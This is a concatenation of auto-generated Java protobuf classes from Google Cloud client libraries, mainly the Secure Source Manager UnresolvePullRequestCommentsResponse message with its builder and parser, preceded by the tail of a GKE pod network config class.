The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ public Builder clearMaxPodsPerNode() { bitField0_ = (bitField0_ & ~0x00000004); maxPodsPerNode_ = null; if (maxPodsPerNodeBuilder_ != null) { maxPodsPerNodeBuilder_.dispose(); maxPodsPerNodeBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ public com.google.container.v1.MaxPodsConstraint.Builder getMaxPodsPerNodeBuilder() { bitField0_ |= 0x00000004; onChanged(); return getMaxPodsPerNodeFieldBuilder().getBuilder(); } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ public com.google.container.v1.MaxPodsConstraintOrBuilder getMaxPodsPerNodeOrBuilder() { if (maxPodsPerNodeBuilder_ != null) { return maxPodsPerNodeBuilder_.getMessageOrBuilder(); } else { return maxPodsPerNode_ == null ? com.google.container.v1.MaxPodsConstraint.getDefaultInstance() : maxPodsPerNode_; } } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.container.v1.MaxPodsConstraint, com.google.container.v1.MaxPodsConstraint.Builder, com.google.container.v1.MaxPodsConstraintOrBuilder> getMaxPodsPerNodeFieldBuilder() { if (maxPodsPerNodeBuilder_ == null) { maxPodsPerNodeBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.container.v1.MaxPodsConstraint, com.google.container.v1.MaxPodsConstraint.Builder, com.google.container.v1.MaxPodsConstraintOrBuilder>( getMaxPodsPerNode(), getParentForChildren(), isClean()); maxPodsPerNode_ = null; } return maxPodsPerNodeBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.container.v1.AdditionalPodNetworkConfig) } // @@protoc_insertion_point(class_scope:google.container.v1.AdditionalPodNetworkConfig) private static final com.google.container.v1.AdditionalPodNetworkConfig DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.container.v1.AdditionalPodNetworkConfig(); } public static com.google.container.v1.AdditionalPodNetworkConfig getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<AdditionalPodNetworkConfig> PARSER = new com.google.protobuf.AbstractParser<AdditionalPodNetworkConfig>() { @java.lang.Override public AdditionalPodNetworkConfig parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<AdditionalPodNetworkConfig> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<AdditionalPodNetworkConfig> getParserForType() { return PARSER; } @java.lang.Override public com.google.container.v1.AdditionalPodNetworkConfig getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,802
java-securesourcemanager/proto-google-cloud-securesourcemanager-v1/src/main/java/com/google/cloud/securesourcemanager/v1/UnresolvePullRequestCommentsResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/securesourcemanager/v1/secure_source_manager.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.securesourcemanager.v1; /** * * * <pre> * The response to unresolve multiple pull request comments. * </pre> * * Protobuf type {@code google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse} */ public final class UnresolvePullRequestCommentsResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) UnresolvePullRequestCommentsResponseOrBuilder { private static final long serialVersionUID = 0L; // Use UnresolvePullRequestCommentsResponse.newBuilder() to construct. private UnresolvePullRequestCommentsResponse( com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private UnresolvePullRequestCommentsResponse() { pullRequestComments_ = java.util.Collections.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new UnresolvePullRequestCommentsResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.securesourcemanager.v1.SecureSourceManagerProto .internal_static_google_cloud_securesourcemanager_v1_UnresolvePullRequestCommentsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.securesourcemanager.v1.SecureSourceManagerProto .internal_static_google_cloud_securesourcemanager_v1_UnresolvePullRequestCommentsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse.class, com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse.Builder .class); } public static final int PULL_REQUEST_COMMENTS_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloud.securesourcemanager.v1.PullRequestComment> pullRequestComments_; /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ @java.lang.Override public java.util.List<com.google.cloud.securesourcemanager.v1.PullRequestComment> getPullRequestCommentsList() { return pullRequestComments_; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ @java.lang.Override public java.util.List< ? extends com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder> getPullRequestCommentsOrBuilderList() { return pullRequestComments_; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ @java.lang.Override public int getPullRequestCommentsCount() { return pullRequestComments_.size(); } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ @java.lang.Override public com.google.cloud.securesourcemanager.v1.PullRequestComment getPullRequestComments( int index) { return pullRequestComments_.get(index); } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ @java.lang.Override public com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder getPullRequestCommentsOrBuilder(int index) { return pullRequestComments_.get(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < pullRequestComments_.size(); i++) { output.writeMessage(1, pullRequestComments_.get(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < pullRequestComments_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, pullRequestComments_.get(i)); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse)) { return super.equals(obj); } com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse other = (com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) obj; if (!getPullRequestCommentsList().equals(other.getPullRequestCommentsList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getPullRequestCommentsCount() > 0) { hash = (37 * hash) + PULL_REQUEST_COMMENTS_FIELD_NUMBER; hash = (53 * hash) + getPullRequestCommentsList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom(java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom(com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom(byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom(com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * The response to unresolve multiple pull request comments. * </pre> * * Protobuf type {@code google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.securesourcemanager.v1.SecureSourceManagerProto .internal_static_google_cloud_securesourcemanager_v1_UnresolvePullRequestCommentsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.securesourcemanager.v1.SecureSourceManagerProto .internal_static_google_cloud_securesourcemanager_v1_UnresolvePullRequestCommentsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse.class, com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse.Builder .class); } // Construct using // com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (pullRequestCommentsBuilder_ == null) { pullRequestComments_ = java.util.Collections.emptyList(); } else { pullRequestComments_ = null; pullRequestCommentsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.securesourcemanager.v1.SecureSourceManagerProto .internal_static_google_cloud_securesourcemanager_v1_UnresolvePullRequestCommentsResponse_descriptor; } @java.lang.Override public com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse getDefaultInstanceForType() { return com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse .getDefaultInstance(); } @java.lang.Override public com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse build() { com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse buildPartial() { com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse result = new com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse result) { if (pullRequestCommentsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { pullRequestComments_ = java.util.Collections.unmodifiableList(pullRequestComments_); bitField0_ = (bitField0_ & ~0x00000001); } result.pullRequestComments_ = pullRequestComments_; } else { result.pullRequestComments_ = pullRequestCommentsBuilder_.build(); } } private void buildPartial0( com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse result) { int from_bitField0_ = bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) { return mergeFrom( (com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse other) { if (other == com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse .getDefaultInstance()) return this; if (pullRequestCommentsBuilder_ == null) { if (!other.pullRequestComments_.isEmpty()) { if (pullRequestComments_.isEmpty()) { pullRequestComments_ = other.pullRequestComments_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensurePullRequestCommentsIsMutable(); pullRequestComments_.addAll(other.pullRequestComments_); } onChanged(); } } else { if (!other.pullRequestComments_.isEmpty()) { if (pullRequestCommentsBuilder_.isEmpty()) { pullRequestCommentsBuilder_.dispose(); pullRequestCommentsBuilder_ = null; pullRequestComments_ = other.pullRequestComments_; bitField0_ = (bitField0_ & ~0x00000001); pullRequestCommentsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getPullRequestCommentsFieldBuilder() : null; } else { pullRequestCommentsBuilder_.addAllMessages(other.pullRequestComments_); } } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloud.securesourcemanager.v1.PullRequestComment m = input.readMessage( com.google.cloud.securesourcemanager.v1.PullRequestComment.parser(), extensionRegistry); if (pullRequestCommentsBuilder_ == null) { ensurePullRequestCommentsIsMutable(); pullRequestComments_.add(m); } else { pullRequestCommentsBuilder_.addMessage(m); } break; } // case 10 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.securesourcemanager.v1.PullRequestComment> pullRequestComments_ = java.util.Collections.emptyList(); private void ensurePullRequestCommentsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { pullRequestComments_ = new java.util.ArrayList<com.google.cloud.securesourcemanager.v1.PullRequestComment>( pullRequestComments_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.securesourcemanager.v1.PullRequestComment, com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder, com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder> pullRequestCommentsBuilder_; /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public java.util.List<com.google.cloud.securesourcemanager.v1.PullRequestComment> getPullRequestCommentsList() { if (pullRequestCommentsBuilder_ == null) { return java.util.Collections.unmodifiableList(pullRequestComments_); } else { return pullRequestCommentsBuilder_.getMessageList(); } } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public int getPullRequestCommentsCount() { if (pullRequestCommentsBuilder_ == null) { return pullRequestComments_.size(); } else { return pullRequestCommentsBuilder_.getCount(); } } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public com.google.cloud.securesourcemanager.v1.PullRequestComment getPullRequestComments( int index) { if (pullRequestCommentsBuilder_ == null) { return pullRequestComments_.get(index); } else { return pullRequestCommentsBuilder_.getMessage(index); } } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder setPullRequestComments( int index, com.google.cloud.securesourcemanager.v1.PullRequestComment value) { if (pullRequestCommentsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePullRequestCommentsIsMutable(); pullRequestComments_.set(index, value); onChanged(); } else { pullRequestCommentsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder setPullRequestComments( int index, com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder builderForValue) { if (pullRequestCommentsBuilder_ == null) { ensurePullRequestCommentsIsMutable(); pullRequestComments_.set(index, builderForValue.build()); onChanged(); } else { pullRequestCommentsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder addPullRequestComments( com.google.cloud.securesourcemanager.v1.PullRequestComment value) { if (pullRequestCommentsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePullRequestCommentsIsMutable(); pullRequestComments_.add(value); onChanged(); } else { pullRequestCommentsBuilder_.addMessage(value); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder addPullRequestComments( int index, com.google.cloud.securesourcemanager.v1.PullRequestComment value) { if (pullRequestCommentsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePullRequestCommentsIsMutable(); pullRequestComments_.add(index, value); onChanged(); } else { pullRequestCommentsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder addPullRequestComments( com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder builderForValue) { if (pullRequestCommentsBuilder_ == null) { ensurePullRequestCommentsIsMutable(); pullRequestComments_.add(builderForValue.build()); onChanged(); } else { pullRequestCommentsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder addPullRequestComments( int index, com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder builderForValue) { if (pullRequestCommentsBuilder_ == null) { ensurePullRequestCommentsIsMutable(); pullRequestComments_.add(index, builderForValue.build()); onChanged(); } else { pullRequestCommentsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder addAllPullRequestComments( java.lang.Iterable<? extends com.google.cloud.securesourcemanager.v1.PullRequestComment> values) { if (pullRequestCommentsBuilder_ == null) { ensurePullRequestCommentsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, pullRequestComments_); onChanged(); } else { pullRequestCommentsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder clearPullRequestComments() { if (pullRequestCommentsBuilder_ == null) { pullRequestComments_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { pullRequestCommentsBuilder_.clear(); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public Builder removePullRequestComments(int index) { if (pullRequestCommentsBuilder_ == null) { ensurePullRequestCommentsIsMutable(); pullRequestComments_.remove(index); onChanged(); } else { pullRequestCommentsBuilder_.remove(index); } return this; } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder getPullRequestCommentsBuilder(int index) { return getPullRequestCommentsFieldBuilder().getBuilder(index); } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder getPullRequestCommentsOrBuilder(int index) { if (pullRequestCommentsBuilder_ == null) { return pullRequestComments_.get(index); } else { return pullRequestCommentsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public java.util.List< ? extends com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder> getPullRequestCommentsOrBuilderList() { if (pullRequestCommentsBuilder_ != null) { return pullRequestCommentsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(pullRequestComments_); } } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder addPullRequestCommentsBuilder() { return getPullRequestCommentsFieldBuilder() .addBuilder( com.google.cloud.securesourcemanager.v1.PullRequestComment.getDefaultInstance()); } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder addPullRequestCommentsBuilder(int index) { return getPullRequestCommentsFieldBuilder() .addBuilder( index, com.google.cloud.securesourcemanager.v1.PullRequestComment.getDefaultInstance()); } /** * * * <pre> * The list of pull request comments unresolved. * </pre> * * <code> * repeated .google.cloud.securesourcemanager.v1.PullRequestComment pull_request_comments = 1; * </code> */ public java.util.List<com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder> getPullRequestCommentsBuilderList() { return getPullRequestCommentsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.securesourcemanager.v1.PullRequestComment, com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder, com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder> getPullRequestCommentsFieldBuilder() { if (pullRequestCommentsBuilder_ == null) { pullRequestCommentsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.securesourcemanager.v1.PullRequestComment, com.google.cloud.securesourcemanager.v1.PullRequestComment.Builder, com.google.cloud.securesourcemanager.v1.PullRequestCommentOrBuilder>( pullRequestComments_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); pullRequestComments_ = null; } return pullRequestCommentsBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) } // @@protoc_insertion_point(class_scope:google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse) private static final com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse(); } public static com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<UnresolvePullRequestCommentsResponse> PARSER = new com.google.protobuf.AbstractParser<UnresolvePullRequestCommentsResponse>() { @java.lang.Override public UnresolvePullRequestCommentsResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<UnresolvePullRequestCommentsResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<UnresolvePullRequestCommentsResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.securesourcemanager.v1.UnresolvePullRequestCommentsResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/flink
36,137
flink-table/flink-table-planner/src/main/java/org/apache/flink/table/planner/plan/nodes/exec/stream/StreamExecPythonGroupWindowAggregate.java
